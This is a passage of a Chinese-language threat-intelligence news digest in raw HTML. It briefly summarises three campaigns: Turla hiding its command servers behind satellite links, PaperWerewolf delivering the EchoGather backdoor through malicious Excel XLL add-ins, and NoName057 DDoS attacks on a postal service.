data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Turla利用卫星通信漏洞隐匿控制中心，对目标机构发动精准攻击</span></span></p></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;list&#34;,{&#34;type&#34;:&#34;ul&#34;,&#34;style&#34;:&#34;list-style-type: circle;&#34;,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:null},&#34;listitem&#34;,{&#34;style&#34;:&#34;font-size:14px;&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: left;"><span leaf="">KRYPTON, SUMMIT, WRAITH, SIG23, Pfinet, UNC4210, Secret Blizzard, UAC-0024, TAG_0530, MAKERSMARK, Waterbug, Snake, Pacifier APT, Hippo Team, Skipper Turla, UAC-0003, Uroburos, Popeye, APT-Q-78, ITG12, UAC-0144, Venomous Bear, IRON HUNTER, WhiteBear, Blue Python, Group 88, G0010, ATK13, Turla Team</span></span></p></div></li><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="font-weight: bold;text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">家族团伙主要影响行业：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">能源, 互联网技术服务, 金融, 政法</span></span></p></div></li><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">https://</span><span leaf="">mp.weixin.qq.com/s?__biz=MzA4ODEyODA3MQ==&amp;mid=2247494970&amp;idx=1&amp;sn=4be215cb43556093f1068edbe77d3e75&amp;poc_token=HPKbTGmjQQxbaIr8G-7dYjfynqydUDu23c3WqMC-</span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;" data-mpa-action-id="md8j92vi11y1"><span leaf=""><span textstyle="" style="font-size: 14px;">Turla APT 组织是当今技术较为先进的APT威胁组织之一，其活动可追溯至 2007 年，2014 年被首次发现。该组织采用自主研发的多款高复杂性恶意软件，具备远程控制和信息窃取能力，攻击中会不断更新武器库、开发恶意软件变种并调整攻击手法。其独特优势在于利用卫星通信安全漏洞隐藏控制服务器真实位置，搭配多层次、隐蔽的攻击策略规避传统防御，展现出在技术漏洞利用、通信痕迹掩盖及攻击策略改进方面的高超能力。该组织主要针对各类敏感相关机构发起攻击，旨在获取敏感信息并破坏目标系统安全防护，对全球网络安全防御构成严峻挑战，加剧了相关目标的系统风险与全球网络安全防护压力。</span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">PaperWerewolf借助恶意Excel加载项传播XLL文件，突破传统防御实现后门秘密植入</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><p style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span leaf="" style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span textstyle="" style="letter-spacing: 0.034em;background-color: transparent;font-weight: bold;">家族团伙</span><span textstyle="" style="font-weight: bold;">主要影响行业：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">政法, 金融, 能源, 电信运营商</span></span></p></div></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://securityonline.info/ai-generated-decoys-xll-stealth-inside-the-new-echogather-cyber-espionage-campaign/" target="_blank">https://securityonline.info/ai-generated-decoys-xll-stealth-inside-the-new-echogather-cyber-espionage-campaign/</a></span></span></p></li></ul></p></div></div><p style="text-indent: 2em;margin-top: 24px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mef52r511pda" data-mpa-action-id="mef52r5b7jz" data-pm-slice="0 0 []">最新报告显示，PaperWerewolf 近期将网络间谍攻击手法从传统宏病毒转向利用 Excel 加载项 (XLL 文件)，该活动于2025年10月底被检测到。攻击者使用的恶意 XLL 文件作为原生 Windows DLL 运行，可绕过微软安全限制，通过 DLL_THREAD_DETACH 机制延迟激活恶意载荷。执行后植入 EchoGather 后门，该后门可收集系统信息并通过伪装成外卖服务的 HTTPS 通信与控制服务器连接。攻击者通过鱼叉式钓鱼邮件分发带夸张名称的 XLL 文件，邮件附件为 AI 生成的伪造官方信函，同时利用 WinRAR 漏洞 (CVE-2025-8088) 进行恶意代码投递。此攻击可导致目标系统长期被渗透，敏感信息被窃取，对高科技和国防领域构成严重安全威胁。</span></p></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9i4u1nvn"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8majiw20v4" style="font-size: 32px;" data-mpa-action-id="md8majjwecx" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">NoName057用混合战术发起大规模DDoS攻击，致核心系统瘫痪与服务中断</span></span></p></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></p><p><span leaf="">NoName057 group, NoName05716, NoName057(16), 05716nnm, Nnm05716</span></p></li><li style="font-size:14px;"><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">家族团伙主要影响行业：</span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">政法, 电信运营商</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="color: rgb(0, 82, 255);font-weight: bold;font-size: 14px;text-align: left;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><a href="https://www.hendryadrian.com/pro-russian-hackers-claim-cyberattack-on-french-postal-service/" target="_blank">https://www.hendryadrian.com/pro-russian-hackers-claim-cyberattack-on-french-postal-service/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;"><span leaf="" mpa-font-style="mdig1jnt1o4d" style="font-size: 14px;" data-mpa-action-id="mdig1jo4rhy" data-pm-slice="0 0 []">圣诞假日前夕，国外一邮政服务遭大规模 DDoS 攻击，导致核心计算机系统瘫痪、服务中断。此次攻击由NoName057组织实施，采用流量轰击方式，疑似利用僵尸网络节点协同发起数据洪流，突破常规防护措施，使服务器因负荷剧增无法正常响应。该事件被归为特定战术网络攻势范畴，是一系列针对相关地区机构与公共服务的有组织网络侵袭行动之一，反映出通过网络手段施加影响的趋势。攻击虽未披露具体流量峰值、持续时长等技术细节，但已引发对关键基础设施安全防护的警惕，不仅严重影响邮政及物流服务运行，还可能导致公众信任下降、社会不稳定风险，加剧相关地区的网络安全防备压力。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" 